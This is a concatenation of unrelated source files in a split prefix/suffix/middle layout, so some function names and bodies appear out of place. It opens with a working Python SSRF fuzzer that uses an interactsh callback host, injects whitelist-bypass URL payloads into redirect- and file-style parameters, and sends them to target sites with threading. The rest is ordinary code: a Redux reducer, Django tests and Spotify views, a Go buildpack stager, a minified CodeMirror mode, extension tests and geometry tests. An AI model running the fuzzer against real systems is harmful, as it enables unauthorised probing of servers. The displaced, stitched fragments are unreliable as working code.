regexParams = regex.compile('(?<=(access|dbg|debug|edit|grant|clone|exec|execute|load|make|modify|reset|shell|toggle|adm|root|cfg|dest|redirect|uri|path|continue|url|window|next|data|site|html|validate|domain|callback|return|host|port|to|out|view|dir|show|navigation|open|file|document|folder|pg|php_path|doc|img|filename|file_name|image)=)(.*)(?=(&|$))', flags=regex.IGNORECASE)
extractInteractionServerURL = "(?<=] )([a-z0-9][a-z0-9][a-z0-9].*)"
def getFileSize(fileID):
interactionLogs = open(f"output/threadsLogs/interaction-logs{fileID}.txt", "r")
return len(interactionLogs.read())
def getInteractionServer():
id = random.randint(0, 999999)
os.system(f"interactsh-client -pi 1 &> output/threadsLogs/interaction-logs{id}.txt &")
time.sleep(2)
interactionServer = None
while not interactionServer:
interactionLogs = open(f"output/threadsLogs/interaction-logs{id}.txt", "r")
fileContent = interactionLogs.read()
pastInteractionLogsSize = len(fileContent)
interactionServer = regex.search(extractInteractionServerURL, fileContent)
time.sleep(2)
interactionServer = interactionServer.group()
return interactionServer, id
def exception_verbose_message(exceptionType):
if args.verbose:
if exceptionType == "timeout":
print("\nTimeout detected... URL skipped")
elif exceptionType == "redirects":
print("\nToo many redirects... URL skipped")
elif exceptionType == "others":
print("\nRequest error... URL skipped")
def splitURLS(threadsSize): #Multithreading
splitted = []
URLSsize = len(allURLs)
width = int(URLSsize/threadsSize)
if width == 0:
width = 1
endVal = 0
i = 0
while endVal != URLSsize:
if URLSsize <= i + 2 * width:
if len(splitted) == threadsSize - 2:
endVal = int(i + (URLSsize - i)/2)
else:
endVal = URLSsize
else:
endVal = i + width
splitted.append(allURLs[i: endVal])
i += width
return splitted
def generatePayloads(whitelistedHost, interactionHost):
generated =[
f"http://{interactionHost}",
f"//{interactionHost}",
f"http://{whitelistedHost}.{interactionHost}", # whitelisted.attacker.com
f"http://{interactionHost}?{whitelistedHost}",
f"http://{interactionHost}/{whitelistedHost}",
f"http://{interactionHost}%ff@{whitelistedHost}",
f"http://{interactionHost}%ff.{whitelistedHost}",
f"http://{whitelistedHost}%25253F@{interactionHost}",
f"http://{whitelistedHost}%253F@{interactionHost}",
f"http://{whitelistedHost}%3F@{interactionHost}",
f"http://{whitelistedHost}@{interactionHost}",
f"http://foo@{interactionHost}:80@{whitelistedHost}",
f"http://foo@{interactionHost}%20@{whitelistedHost}",
f"http://foo@{interactionHost}%09@{whitelistedHost}"
]
return generated
def smart_extract_host(url, matchedElement):
urlDecodedElem = requests.utils.unquote(matchedElement)
hostExtractorRegex = '(?<=(https|http):\/\/)(.*?)(?=\/)'
extractedHost = regex.search(hostExtractorRegex, urlDecodedElem)
if not extractedHost:
extractedHost = regex.search(hostExtractorRegex, url)
return extractedHost.group()
def prepare_url_with_regex(url):
replacedURL = regexParams.sub(FUZZ_PLACE_HOLDER, url)
matchedElem = regexParams.search(url)
if matchedElem:
matchedElem = matchedElem.group()
return replacedURL, matchedElem
def fuzz_SSRF(url, interactionServer, fileID):
pastInteractionLogsSize = getFileSize(fileID)
replacedURL, matchedElem = prepare_url_with_regex(url)
if not matchedElem: #No relevant parameter matching
return
if args.oneshot:
payloadsList = [f"http://{interactionServer}"]
else:
host = smart_extract_host(url, matchedElem)
payloadsList = generatePayloads(host, interactionServer)
if args.verbose:
if not args.threads:
print(f" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +")
print(f"\nStarting fuzzing {replacedURL}")
for payload in payloadsList:
fuzz_and_detect_with_payload("FUZZ", replacedURL, payload, fileID)
time.sleep(2)
if isInteractionDetected(pastInteractionLogsSize, fileID):
if args.verbose:
print(f"\nSSRF identified in {replacedURL}. Determining valid payload ...")
for payload in payloadsList:
if fuzz_and_detect_with_payload("DETECT", replacedURL, payload, fileID):
print(f"SSRF detected in {replacedURL} with payload {payload}.")
with LOCK:
outputFile.write(f"SSRF detected in {replacedURL} with payload {payload}\n")
return
else:
if args.verbose:
print(f"\nNothing detected for {replacedURL}")
def fuzz_and_detect_with_payload(type ,url, payload, fileID):
pastInteractionLogsSize = getFileSize(fileID)
fuzzedUrl = url.replace(FUZZ_PLACE_HOLDER, payload)
if args.verbose:
if not args.threads:
print(f"Testing payload: {payload} ", end="\r")
requests.get(fuzzedUrl, timeout=TIMEOUT_DELAY)
if type == "DETECT":
time.sleep(2)
return isInteractionDetected(pastInteractionLogsSize, fileID)
def isInteractionDetected(pastInteractionLogsSize, fileID):
currentInteractionLogsSize = getFileSize(fileID)
if currentInteractionLogsSize != pastInteractionLogsSize:
return True
return False
def sequential_url_scan(urlList):
interactionServer, fileID = getInteractionServer()
for url in urlList:
try:
fuzz_SSRF(url, interactionServer, fileID)
except requests.exceptions.Timeout:
exception_verbose_message("timeout")
except requests.exceptions.TooManyRedirects:
exception_verbose_message("redirects")
except Exception as e: #requests.exceptions.RequestException:
print(f"{url} : {e}")
exception_verbose_message("others")
def main():
if args.url:
try:
sequential_url_scan([args.url])
except Exception as e:
print("\nInvalid URL")
elif args.file:
if not args.threads or args.threads == 1:
sequential_url_scan(allURLs)
else:
workingThreads = []
split = splitURLS(args.threads)
for subList in split:
t = threading.Thread(target=sequential_url_scan, args=[subList])
t.start()
workingThreads.append(t)
for thread in workingThreads:
thread.join()
outputFile.close()
if __name__ == '__main__':
main() | |
questions-reducer.js | import autodux from 'autodux';
import cuid from 'cuid';
import { Scoring } from '../../../config/config';
export const {
reducer,
slice,
actions: {
addQuestion,
removeQuestion,
updateQuestion,
setQuestions,
},
selectors: {
getQuestions,
getScore,
isLoaded,
} | } = autodux({
slice: 'questions',
initial: {
loaded: false,
questions: [],
},
actions: {
addQuestion: {
create: payload => ({
id: cuid(),
timestamp: Date.now(),
...payload,
}),
reducer: (state, payload) => ({
...state,
questions: state.questions.concat([payload]),
})
},
removeQuestion: (state, payload) => ({
...state,
questions: state.questions.filter(question => question.id !== payload),
}),
updateQuestion: (state, payload) => ({
...state,
questions: state.questions.map(question => question.id === payload.id
? { ...question, ...payload.fields }
: question),
}),
setQuestions: (state, payload) => ({
...state,
loaded: true,
questions: payload,
}),
},
selectors: {
getScore: state => state.questions.reduce((score, question) =>
score + Scoring[question.status]
, 0),
isLoaded: state => state.loaded,
}
}); | |
tests_admin.py | from django.test import TestCase
from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import Client
from organization.models import Organization
class AdminSiteTests(TestCase):
def setUp(self):
admin_email = '[email protected]'
admin_pass = 'password123'
self.client = Client()
self.organization = Organization.objects.create(name="PNSN")
self.admin_user = get_user_model().objects.create_superuser(
email=admin_email,
password=admin_pass,
organization=self.organization,
)
self.client.force_login(self.admin_user)
self.user = get_user_model().objects.create_user(
email='[email protected]',
password='password123',
firstname='your',
lastname='mom',
organization=self.organization
)
def test_users_listed(self):
|
def test_user_change_page(self):
'''Test that user didt page works'''
url = reverse('admin:core_user_change', args=[self.user.id])
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
def test_create_user_page(self):
'''test that create user page works'''
url = reverse('admin:core_user_add')
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
| """Test that users are listed on the user page"""
url = reverse('admin:core_user_changelist')
res = self.client.get(url)
self.assertContains(res, self.user.firstname)
self.assertContains(res, self.user.email) |
stager.go | package libbuildpack
import (
"errors"
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strings"
)
type Stager struct {
buildDir string
cacheDir string
depsDir string
depsIdx string
manifest *Manifest
log *Logger
}
func NewStager(args []string, logger *Logger, manifest *Manifest) *Stager |
func (s *Stager) DepDir() string {
return filepath.Join(s.depsDir, s.depsIdx)
}
func (s *Stager) WriteConfigYml(config interface{}) error {
if config == nil {
config = map[interface{}]interface{}{}
}
data := map[string]interface{}{"name": s.manifest.Language(), "config": config}
y := &YAML{}
return y.Write(filepath.Join(s.DepDir(), "config.yml"), data)
}
func (s *Stager) WriteEnvFile(envVar, envVal string) error {
envDir := filepath.Join(s.DepDir(), "env")
if err := os.MkdirAll(envDir, 0755); err != nil {
return err
}
return ioutil.WriteFile(filepath.Join(envDir, envVar), []byte(envVal), 0644)
}
func (s *Stager) AddBinDependencyLink(destPath, sourceName string) error {
binDir := filepath.Join(s.DepDir(), "bin")
if err := os.MkdirAll(binDir, 0755); err != nil {
return err
}
relPath, err := filepath.Rel(binDir, destPath)
if err != nil {
return err
}
return os.Symlink(relPath, filepath.Join(binDir, sourceName))
}
func (s *Stager) LinkDirectoryInDepDir(destDir, depSubDir string) error {
srcDir := filepath.Join(s.DepDir(), depSubDir)
if err := os.MkdirAll(srcDir, 0755); err != nil {
return err
}
files, err := ioutil.ReadDir(destDir)
if err != nil {
return err
}
for _, file := range files {
relPath, err := filepath.Rel(srcDir, filepath.Join(destDir, file.Name()))
if err != nil {
return err
}
if err := os.Symlink(relPath, filepath.Join(srcDir, file.Name())); err != nil {
return err
}
}
return nil
}
func (s *Stager) CheckBuildpackValid() error {
version, err := s.manifest.Version()
if err != nil {
s.log.Error("Could not determine buildpack version: %s", err.Error())
return err
}
s.log.BeginStep("%s Buildpack version %s", strings.Title(s.manifest.Language()), version)
err = s.manifest.CheckStackSupport()
if err != nil {
s.log.Error("Stack not supported by buildpack: %s", err.Error())
return err
}
s.manifest.CheckBuildpackVersion(s.cacheDir)
return nil
}
func (s *Stager) StagingComplete() {
s.manifest.StoreBuildpackMetadata(s.cacheDir)
}
func (s *Stager) ClearCache() error {
files, err := ioutil.ReadDir(s.cacheDir)
if err != nil {
if os.IsNotExist(err) {
return nil
}
return err
}
for _, file := range files {
err = os.RemoveAll(filepath.Join(s.cacheDir, file.Name()))
if err != nil {
return err
}
}
return nil
}
func (s *Stager) ClearDepDir() error {
files, err := ioutil.ReadDir(s.DepDir())
if err != nil {
return err
}
for _, file := range files {
if file.Name() != "config.yml" {
if err := os.RemoveAll(filepath.Join(s.DepDir(), file.Name())); err != nil {
return err
}
}
}
return nil
}
func (s *Stager) WriteProfileD(scriptName, scriptContents string) error {
profileDir := filepath.Join(s.DepDir(), "profile.d")
err := os.MkdirAll(profileDir, 0755)
if err != nil {
return err
}
return writeToFile(strings.NewReader(scriptContents), filepath.Join(profileDir, scriptName), 0755)
}
func (s *Stager) BuildDir() string {
return s.buildDir
}
func (s *Stager) CacheDir() string {
return s.cacheDir
}
func (s *Stager) DepsIdx() string {
return s.depsIdx
}
var stagingEnvVarDirs = map[string]string{
"PATH": "bin",
"LD_LIBRARY_PATH": "lib",
"INCLUDE_PATH": "include",
"CPATH": "include",
"CPPPATH": "include",
"PKG_CONFIG_PATH": "pkgconfig",
}
var launchEnvVarDirs = map[string]string{
"PATH": "bin",
"LD_LIBRARY_PATH": "lib",
}
func (s *Stager) SetStagingEnvironment() error {
for envVar, dir := range stagingEnvVarDirs {
oldVal := os.Getenv(envVar)
depsPaths, err := existingDepsDirs(s.depsDir, dir, s.depsDir)
if err != nil {
return err
}
if len(depsPaths) != 0 {
if len(oldVal) > 0 {
depsPaths = append(depsPaths, oldVal)
}
os.Setenv(envVar, strings.Join(depsPaths, ":"))
}
}
depsPaths, err := existingDepsDirs(s.depsDir, "env", s.depsDir)
if err != nil {
return err
}
for _, dir := range depsPaths {
files, err := ioutil.ReadDir(dir)
if err != nil {
return err
}
for _, file := range files {
if file.Mode().IsRegular() {
val, err := ioutil.ReadFile(filepath.Join(dir, file.Name()))
if err != nil {
return err
}
if err := os.Setenv(file.Name(), string(val)); err != nil {
return err
}
}
}
}
return nil
}
func (s *Stager) SetLaunchEnvironment() error {
scriptContents := ""
for envVar, dir := range launchEnvVarDirs {
depsPaths, err := existingDepsDirs(s.depsDir, dir, "$DEPS_DIR")
if err != nil {
return err
}
if len(depsPaths) != 0 {
scriptContents += fmt.Sprintf(`export %[1]s=%[2]s$([[ ! -z "${%[1]s:-}" ]] && echo ":$%[1]s")`, envVar, strings.Join(depsPaths, ":"))
scriptContents += "\n"
}
}
if err := os.MkdirAll(filepath.Join(s.buildDir, ".profile.d"), 0755); err != nil {
return err
}
scriptLocation := filepath.Join(s.buildDir, ".profile.d", "000_multi-supply.sh")
if err := writeToFile(strings.NewReader(scriptContents), scriptLocation, 0755); err != nil {
return err
}
profileDirs, err := existingDepsDirs(s.depsDir, "profile.d", s.depsDir)
if err != nil {
return err
}
for _, dir := range profileDirs {
sections := strings.Split(dir, string(filepath.Separator))
if len(sections) < 2 {
return errors.New("invalid dep dir")
}
depsIdx := sections[len(sections)-2]
files, err := ioutil.ReadDir(dir)
if err != nil {
return err
}
for _, file := range files {
if file.Mode().IsRegular() {
src := filepath.Join(dir, file.Name())
dest := filepath.Join(s.buildDir, ".profile.d", depsIdx+"_"+file.Name())
if err := CopyFile(src, dest); err != nil {
return err
}
}
}
}
return nil
}
func existingDepsDirs(depsDir, subDir, prefix string) ([]string, error) {
files, err := ioutil.ReadDir(depsDir)
if err != nil {
return nil, err
}
var existingDirs []string
for _, file := range files {
if !file.IsDir() {
continue
}
filesystemDir := filepath.Join(depsDir, file.Name(), subDir)
dirToJoin := filepath.Join(prefix, file.Name(), subDir)
addToDirs, err := FileExists(filesystemDir)
if err != nil {
return nil, err
}
if addToDirs {
existingDirs = append([]string{dirToJoin}, existingDirs...)
}
}
return existingDirs, nil
}
| {
buildDir := args[0]
cacheDir := args[1]
depsDir := ""
depsIdx := ""
if len(args) >= 4 {
depsDir = args[2]
depsIdx = args[3]
}
s := &Stager{buildDir: buildDir,
cacheDir: cacheDir,
depsDir: depsDir,
depsIdx: depsIdx,
manifest: manifest,
log: logger,
}
return s
} |
mod.rs | pub mod install;
pub mod remove; |
||
elm.js | 'use strict';(function(d){"object"==typeof exports&&"object"==typeof module?d(require("../../lib/codemirror")):"function"==typeof define&&define.amd?define(["../../lib/codemirror"],d):d(CodeMirror)})(function(d){d.defineMode("elm",function(){function | (a,c,b){c(b);return b(a,c)}function f(){return function(a,c){if(a.eatWhile(h))return null;var b=a.next();if(p.test(b))return"{"==b&&a.eat("-")?(b="comment",a.eat("#")&&(b="meta"),d(a,c,k(b,1))):null;if("'"==b)return a.eat("\\"),a.next(),a.eat("'")?"string":
"error";if('"'==b)return d(a,c,l);if(q.test(b))return a.eatWhile(m),a.eat(".")?"qualifier":"variable-2";if(r.test(b))return c=1===a.pos,a.eatWhile(m),c?"type":"variable";if(e.test(b)){if("0"==b){if(a.eat(/[xX]/))return a.eatWhile(t),"integer";if(a.eat(/[oO]/))return a.eatWhile(u),"number"}a.eatWhile(e);b="number";a.eat(".")&&(b="number",a.eatWhile(e));a.eat(/[eE]/)&&(b="number",a.eat(/[-+]/),a.eatWhile(e));return b}if(g.test(b)){if("-"==b&&a.eat(/-/)&&(a.eatWhile(/-/),!a.eat(g)))return a.skipToEnd(),
"comment";a.eatWhile(g);return"builtin"}return"error"}}function k(a,c){return 0==c?f():function(b,d){for(var e=c;!b.eol();){var g=b.next();if("{"==g&&b.eat("-"))++e;else if("-"==g&&b.eat("}")&&(--e,0==e))return d(f()),a}d(k(a,e));return a}}function l(a,c){for(;!a.eol();){var b=a.next();if('"'==b)return c(f()),"string";if("\\"==b){if(a.eol()||a.eat(h))return c(v),"string";a.eat("&")||a.next()}}c(f());return"error"}function v(a,c){if(a.eat("\\"))return d(a,c,l);a.next();c(f());return"error"}var r=/[a-z_]/,
q=/[A-Z]/,e=/[0-9]/,t=/[0-9A-Fa-f]/,u=/[0-7]/,m=/[a-z_A-Z0-9']/,g=/[-!#$%&*+.\/<=>?@\\^|~:\u03BB\u2192]/,p=/[(),;[\]`{}]/,h=/[ \t\v\f]/,n=function(){for(var a={},c='case of as if then else let in infix infixl infixr type alias input output foreign loopback module where import exposing _ .. | : = \\ " -> <-'.split(" "),b=c.length;b--;)a[c[b]]="keyword";return a}();return{startState:function(){return{f:f()}},copyState:function(a){return{f:a.f}},token:function(a,c){var b=c.f(a,function(a){c.f=a});a=
a.current();return n.hasOwnProperty(a)?n[a]:b}}});d.defineMIME("text/x-elm","elm")});
| d |
api.test.ts | import test from "tape";
import browser from "webextension-polyfill";
import { isBackground, isContentScript, isWebPage } from "webext-detect-page";
import { PageTarget, Sender, Target } from "../..";
import * as backgroundContext from "../background/api";
import * as localContext from "../background/testingApi";
import {
getPageTitle,
setPageTitle,
closeSelf,
sumIfMeta,
contentScriptOnly,
throws,
notRegistered,
getTrace,
notRegisteredNotification,
getPageTitleNotification,
} from "./api";
function senderIsCurrentPage(
t: test.Test,
sender: Sender | undefined,
message: string
) {
t.equal(sender?.url, location.href, message);
}
function senderisBackground(
t: test.Test,
sender: Sender | undefined,
message: string
) {
t.true(
// TODO: `as any` because `self` is typed for Firefox only
(sender as any).origin === "null" || // Chrome
sender!.url?.endsWith("/_generated_background_page.html"), // Firefox
message
);
}
const { openTab, createTargets, ensureScripts, closeTab } = isBackground()
? localContext
: backgroundContext;
async function delay(timeout: number): Promise<void> {
await new Promise((resolve) => {
setTimeout(resolve, timeout);
});
}
function | (target: Target | PageTarget, expectedTitle: string) {
test(expectedTitle + ": send message and get response", async (t) => {
const title = await getPageTitle(target);
t.equal(title, expectedTitle);
});
test(expectedTitle + ": support parameters", async (t) => {
await setPageTitle(target, "New Title");
const title = await getPageTitle(target);
t.equal(title, "New Title");
});
test(
expectedTitle + ": should receive information from the caller",
async (t) => {
t.equal(await sumIfMeta(target, 1, 2, 3, 4), 10);
}
);
if (!("page" in target)) {
test(
expectedTitle + ": handler must be executed in the content script",
async (t) => {
t.equal(await contentScriptOnly(target), true);
}
);
}
test(
expectedTitle + ": should receive error from a background handler",
async (t) => {
try {
await throws(target);
t.fail("throws() should have thrown but did not");
} catch (error: unknown) {
if (!(error instanceof Error)) {
t.fail("The error is not an instance of Error");
return;
}
if (!error.stack) {
t.fail("The error has no stack");
return;
}
t.equal(error.message, "This my error");
t.true(
error.stack.includes("/contentscript/registration.js"),
"The stacktrace must come from the content script"
);
t.true(
// Chrome format || Firefox format
error.stack.includes("at Object.throws") ||
error.stack.includes("throws@moz-"),
"The stacktrace must include the original name of the method"
);
}
}
);
test(
expectedTitle +
": should receive error from the content script if it’s not registered",
async (t) => {
try {
await notRegistered(target);
t.fail("notRegistered() should have thrown but did not");
} catch (error: unknown) {
if (!(error instanceof Error)) {
t.fail("The error is not an instance of Error");
return;
}
t.equal(
error.message,
`No handler registered for notRegistered in ${
"page" in target ? "extension" : "contentScript"
}`
);
}
}
);
test(expectedTitle + ": should receive trace", async (t) => {
const trace = await getTrace(target);
t.true(Array.isArray(trace));
const originalSender = trace[0];
const directSender = trace[trace.length - 1];
if (isContentScript() || !isBackground()) {
senderIsCurrentPage(
t,
originalSender,
"Messages should mention the current page in trace[0]"
);
} else {
senderisBackground(
t,
directSender,
"Messages should mention the current page (background) in trace[0]"
);
}
if (!("page" in target && isContentScript())) {
senderisBackground(
t,
directSender,
"Messages originated in content scripts or background pages must come directly from the background page"
);
}
if (!isWebPage()) {
t.equal(
trace.length,
1,
"Messages originated in extension pages don’t need to be forwarded"
);
}
});
test(expectedTitle + ": notification should return undefined", async (t) => {
// eslint-disable-next-line @typescript-eslint/no-confusing-void-expression -- Testing for this specifically
t.equals(getPageTitleNotification(target), undefined);
});
test(
expectedTitle +
": notification without registered handlers should not throw",
async (t) => {
notRegisteredNotification(target);
t.pass();
}
);
}
async function init() {
const { tabId, parentFrame, iframe } = await createTargets();
// All `test` calls must be done synchronously, or else the runner assumes they're done
runOnTarget({ tabId, frameId: parentFrame }, "Parent");
runOnTarget({ tabId, frameId: iframe }, "Child");
runOnTarget({ tabId, page: "/iframe.html" }, "Extension frame");
test("should throw the right error when `registerMethod` was never called", async (t) => {
const tabId = await openTab(
"https://fregante.github.io/pixiebrix-testing-ground/Unrelated-CS-on-this-page"
);
try {
await getPageTitle({ tabId });
t.fail("getPageTitle() should have thrown but did not");
} catch (error: unknown) {
if (!(error instanceof Error)) {
t.fail("The error is not an instance of Error");
return;
}
t.equal(
error.message,
"No handler registered for getPageTitle in the receiving end"
);
await closeTab(tabId);
}
});
test("should be able to close the tab from the content script", async (t) => {
await closeSelf({ tabId, frameId: parentFrame });
try {
// Since the tab was closed, this is expected to throw
t.notOk(await browser.tabs.get(tabId), "The tab should not be open");
} catch {
t.pass("The tab was closed");
}
});
test("retries until target is ready", async (t) => {
const tabId = await openTab(
"https://fregante.github.io/pixiebrix-testing-ground/No-static-content-scripts"
);
const request = getPageTitle({ tabId });
await delay(1000); // Simulate a slow-loading tab
await ensureScripts(tabId);
t.equal(await request, "No static content scripts");
await closeTab(tabId);
});
test("retries until it times out", async (t) => {
const tabId = await openTab(
"https://fregante.github.io/pixiebrix-testing-ground/No-static-content-scripts"
);
const startTime = Date.now();
try {
await getPageTitle({ tabId });
t.fail("getPageTitle() should have thrown but did not");
} catch (error: unknown) {
if (!(error instanceof Error)) {
t.fail("The error is not an instance of Error");
return;
}
t.equal(
error.message,
"Could not establish connection. Receiving end does not exist."
);
const duration = Date.now() - startTime;
t.ok(
duration > 4000 && duration < 5000,
`It should take between 4 and 5 seconds (took ${duration / 1000}s)`
);
}
await closeTab(tabId);
});
test("notifications on non-existing targets", async (t) => {
try {
getPageTitleNotification({ tabId: 9001 });
} catch (error: unknown) {
t.fail("Should not throw");
throw error;
}
t.pass();
});
test("notifications when `registerMethod` was never called", async () => {
const tabId = await openTab(
"https://fregante.github.io/pixiebrix-testing-ground/No-static-content-scripts"
);
getPageTitleNotification({ tabId });
await closeTab(tabId);
});
}
void init();
| runOnTarget |
views.py | from django.shortcuts import render, redirect
from .credentials import REDIRECT_URI, CLIENT_SECRET, CLIENT_ID
from rest_framework.views import APIView
from requests import Request, post
from rest_framework import status
from rest_framework.response import Response
from .util import *
from api.models import Room
from .models import Vote
class AuthURL(APIView):
def get(self, request, fornat=None):
scopes = 'user-read-playback-state user-modify-playback-state user-read-currently-playing'
url = Request('GET', 'https://accounts.spotify.com/authorize', params={
'scope': scopes,
'response_type': 'code',
'redirect_uri': REDIRECT_URI,
'client_id': CLIENT_ID
}).prepare().url
return Response({'url': url}, status=status.HTTP_200_OK)
def spotify_callback(request, format=None):
code = request.GET.get('code')
error = request.GET.get('error')
response = post('https://accounts.spotify.com/api/token', data={
'grant_type': 'authorization_code',
'code': code,
'redirect_uri': REDIRECT_URI,
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}).json()
access_token = response.get('access_token')
token_type = response.get('token_type')
refresh_token = response.get('refresh_token')
expires_in = response.get('expires_in')
error = response.get('error')
if not request.session.exists(request.session.session_key):
request.session.create()
update_or_create_user_tokens(
request.session.session_key, access_token, token_type, expires_in, refresh_token)
return redirect('frontend:')
class IsAuthenticated(APIView):
def get(self, request, format=None):
is_authenticated = is_spotify_authenticated(
self.request.session.session_key)
return Response({'status': is_authenticated}, status=status.HTTP_200_OK)
class CurrentSong(APIView):
def get(self, request, format=None):
room_code = self.request.session.get('room_code')
room = Room.objects.filter(code=room_code)
if room.exists():
room = room[0]
else:
return Response({}, status=status.HTTP_404_NOT_FOUND)
host = room.host
endpoint = "player/currently-playing"
response = execute_spotify_api_request(host, endpoint)
if 'error' in response or 'item' not in response:
return Response({}, status=status.HTTP_204_NO_CONTENT)
item = response.get('item')
duration = item.get('duration_ms')
progress = response.get('progress_ms')
album_cover = item.get('album').get('images')[0].get('url')
is_playing = response.get('is_playing')
song_id = item.get('id')
artist_string = ""
for i, artist in enumerate(item.get('artists')):
if i > 0:
artist_string += ", "
name = artist.get('name')
artist_string += name
votes = len(Vote.objects.filter(room=room, song_id=song_id))
song = {
'title': item.get('name'),
'artist': artist_string,
'duration': duration,
'time': progress,
'image_url': album_cover,
'is_playing': is_playing,
'votes': votes,
'votes_required': room.votes_to_skip,
'id': song_id
}
self.update_room_song(room, song_id)
return Response(song, status=status.HTTP_200_OK)
def update_room_song(self, room, song_id):
current_song = room.current_song
if current_song != song_id:
room.current_song = song_id
room.save(update_fields=['current_song'])
votes = Vote.objects.filter(room=room).delete()
class PauseSong(APIView):
def put(self, response, format=None):
room_code = self.request.session.get('room_code')
room = Room.objects.filter(code=room_code)[0]
if self.request.session.session_key == room.host or room.guest_can_pause:
pause_song(room.host)
return Response({}, status=status.HTTP_204_NO_CONTENT)
return Response({}, status=status.HTTP_403_FORBIDDEN)
class PlaySong(APIView):
def put(self, response, format=None):
room_code = self.request.session.get('room_code')
room = Room.objects.filter(code=room_code)[0]
if self.request.session.session_key == room.host or room.guest_can_pause:
play_song(room.host)
return Response({}, status=status.HTTP_204_NO_CONTENT)
return Response({}, status=status.HTTP_403_FORBIDDEN)
class SkipSong(APIView):
def | (self, request, format=None):
room_code = self.request.session.get('room_code')
room = Room.objects.filter(code=room_code)[0]
votes = Vote.objects.filter(room=room, song_id=room.current_song)
votes_needed = room.votes_to_skip
if self.request.session.session_key == room.host or len(votes) + 1 >= votes_needed:
votes.delete()
skip_song(room.host)
else:
vote = Vote(user=self.request.session.session_key,
room=room, song_id=room.current_song)
vote.save()
return Response({}, status.HTTP_204_NO_CONTENT)
| post |
tests.py | from mapping.map import Map
from utils.position import Position
from utils.utils import bresenham_line, filled_midpoint_circle
import matplotlib.pyplot as plt
def map_to_grid_pos():
print('Test: map_to_grid_pos')
lower_left_pos = Position(-5.0, -5.0)
upper_right_pos = Position(5.0, 5.0)
test_map = Map(lower_left_pos, upper_right_pos, 2.0)
assert(test_map.grid.shape == (20, 20))
grid_pos = test_map.to_grid_pos(Position(-5, -5))
assert(grid_pos.x == 0 and grid_pos.y == 0)
grid_pos = test_map.to_grid_pos(Position(-4.5, -5))
assert(grid_pos.x == 1 and grid_pos.y == 0)
grid_pos = test_map.to_grid_pos(Position(-4.501, -5))
assert(grid_pos.x == 0 and grid_pos.y == 0)
grid_pos = test_map.to_grid_pos(Position(5, 5))
assert(grid_pos.x == 20 and grid_pos.y == 20)
grid_pos = test_map.to_grid_pos(Position(4.99, 4.99))
assert(grid_pos.x == 19 and grid_pos.y == 19)
print('OK')
def map_to_real_pos():
print('Test: map_to_real_pos')
lower_left_pos = Position(-5.0, -5.0)
upper_right_pos = Position(5.0, 5.0)
test_map = Map(lower_left_pos, upper_right_pos, 2.0)
assert(test_map.grid.shape == (20, 20))
real_pos = test_map.to_real_pos(Position(0, 0))
assert(real_pos.x == -5 and real_pos.y == -5)
real_pos = test_map.to_real_pos(Position(1, 0))
assert(real_pos.x == -4.5 and real_pos.y == -5)
real_pos = test_map.to_real_pos(Position(2, 0))
assert(real_pos.x == -4 and real_pos.y == -5)
real_pos = test_map.to_real_pos(Position(20, 20))
assert(real_pos.x == 5 and real_pos.y == 5)
real_pos = test_map.to_real_pos(Position(19, 19))
assert(real_pos.x == 4.5 and real_pos.y == 4.5)
print('OK')
def utils_bresenham_line():
print('Test: utils_bresenham_line')
line = bresenham_line(0, 0, 5, 5)
assert(line[0].x == 0 and line[0].y == 0)
assert(line[1].x == 1 and line[1].y == 1)
assert(line[2].x == 2 and line[2].y == 2)
assert(line[3].x == 3 and line[3].y == 3)
assert(line[4].x == 4 and line[4].y == 4)
assert(line[5].x == 5 and line[5].y == 5)
line = bresenham_line(5, 5, 0, 0)
assert(line[0].x == 5 and line[0].y == 5)
assert(line[1].x == 4 and line[1].y == 4)
assert(line[2].x == 3 and line[2].y == 3)
assert(line[3].x == 2 and line[3].y == 2)
assert(line[4].x == 1 and line[4].y == 1)
assert(line[5].x == 0 and line[5].y == 0)
line = bresenham_line(2, 5, 8, 9)
assert(line[0].x == 2 and line[0].y == 5)
assert(line[1].x == 3 and line[1].y == 6)
assert(line[2].x == 4 and line[2].y == 6)
assert(line[3].x == 5 and line[3].y == 7)
assert(line[4].x == 6 and line[4].y == 8)
assert(line[5].x == 7 and line[5].y == 8)
assert(line[6].x == 8 and line[6].y == 9)
print('OK')
def utils_filled_midpoint_circle():
print('Test: utils_filled_midpoint_circle')
circle = filled_midpoint_circle(5, 5, 5)
result = [' x: 0 y: 5',
' x: 1 y: 5',
' x: 2 y: 5',
' x: 3 y: 5',
' x: 4 y: 5',
' x: 5 y: 5',
' x: 6 y: 5',
' x: 7 y: 5',
' x: 8 y: 5',
' x: 9 y: 5',
' x: 10 y: 5',
' x: 0 y: 6',
' x: 1 y: 6',
' x: 2 y: 6',
' x: 3 y: 6',
' x: 4 y: 6',
' x: 5 y: 6',
' x: 6 y: 6',
' x: 7 y: 6',
' x: 8 y: 6',
' x: 9 y: 6',
' x: 10 y: 6',
' x: 0 y: 4',
' x: 1 y: 4',
' x: 2 y: 4',
' x: 3 y: 4',
' x: 4 y: 4',
' x: 5 y: 4',
' x: 6 y: 4',
' x: 7 y: 4',
' x: 8 y: 4',
' x: 9 y: 4',
' x: 10 y: 4',
' x: 0 y: 7',
' x: 1 y: 7',
' x: 2 y: 7',
' x: 3 y: 7',
' x: 4 y: 7',
' x: 5 y: 7',
' x: 6 y: 7',
' x: 7 y: 7',
' x: 8 y: 7',
' x: 9 y: 7',
' x: 10 y: 7',
' x: 0 y: 3',
' x: 1 y: 3',
' x: 2 y: 3',
' x: 3 y: 3',
' x: 4 y: 3',
' x: 5 y: 3',
' x: 6 y: 3',
' x: 7 y: 3',
' x: 8 y: 3',
' x: 9 y: 3',
' x: 10 y: 3',
' x: 3 y: 10',
' x: 3 y: 0',
' x: 4 y: 10',
' x: 4 y: 0',
' x: 5 y: 10',
' x: 5 y: 0',
' x: 6 y: 10',
' x: 6 y: 0',
' x: 7 y: 10',
' x: 7 y: 0',
' x: 1 y: 8',
' x: 2 y: 8',
' x: 3 y: 8',
' x: 4 y: 8',
' x: 5 y: 8',
' x: 6 y: 8',
' x: 7 y: 8',
' x: 8 y: 8',
' x: 9 y: 8',
' x: 1 y: 2', | ' x: 5 y: 2',
' x: 6 y: 2',
' x: 7 y: 2',
' x: 8 y: 2',
' x: 9 y: 2',
' x: 2 y: 9',
' x: 2 y: 1',
' x: 3 y: 9',
' x: 3 y: 1',
